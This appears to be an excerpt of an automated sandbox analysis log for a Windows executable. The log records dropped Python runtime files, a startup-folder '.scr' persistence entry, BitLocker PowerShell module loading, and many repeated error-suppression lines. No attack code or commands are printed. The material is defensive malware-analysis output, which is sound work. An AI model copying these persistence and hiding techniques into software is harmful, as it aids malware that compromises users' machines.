Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\libssl-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\select.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\4mvljvuo\4mvljvuo.dll	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\VCRUNTIME140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\python313.dll	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\libffi-8.dll	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\libcrypto-3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	File created: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Jump to dropped file

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Jump to behavior

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

Code function: 0_2_00007FF6BA3A5830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,

0_2_00007FF6BA3A5830

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
